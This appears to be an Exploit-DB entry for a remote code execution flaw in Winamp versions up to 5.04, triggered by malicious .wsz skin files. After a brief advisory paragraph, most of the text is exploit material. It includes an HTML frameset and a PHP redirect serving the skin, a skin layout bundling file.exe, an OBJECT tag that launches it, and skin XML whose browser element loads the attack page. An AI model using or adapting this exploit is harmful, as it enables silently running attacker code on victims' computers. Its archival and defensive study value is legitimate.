NullSoft Winamp 2-5 - .wsz Remote Code Execution Vulnerability

ID EDB-ID:24413
Type exploitdb
Reporter anonymous
Modified 2004-07-26T00:00:00


NullSoft Winamp 2-5 .WSZ File Remote Code Execution Vulnerability. Remote exploit for windows platform


A vulnerability in Winamp has been discovered that may permit remote attackers to execute arbitrary code on client computers through a malicious .WSZ Winamp skin file. This issue is currently being exploited in the wild.

This vulnerability may be exploited through a Web site, or any other means that will allow the attacker to transmit the malicious file to a victim user.

This vulnerability is reported to affect all versions of Winamp up to and including 5.04. 

<frameset rows="*,1" framespacing="0" border="0" frameborder="NO">
<frame src="load.php" name="frame_content" scrolling="auto" noresize>

$httpref = $HTTP_REFERER;
header("Location: http://URL/foo.wsz");

foo.wsz (
/html/file.exe (malicious file to execute)
/html/test.htm (html to load the .exe)

<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='file.exe'>

<include file="player.xml"/>

<browser id="browser" x="0" y="0" w="0" h="0" relatw="1" relath="1" url="file:///@SKINPATH@html/test.htm" />

<container id="main" name="main">
<include file="player-normal.xml"/>

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<WinampAbstractionLayer version="1.1">
<author>Petrol Designs</author>

<include file="xml/includes.xml"/>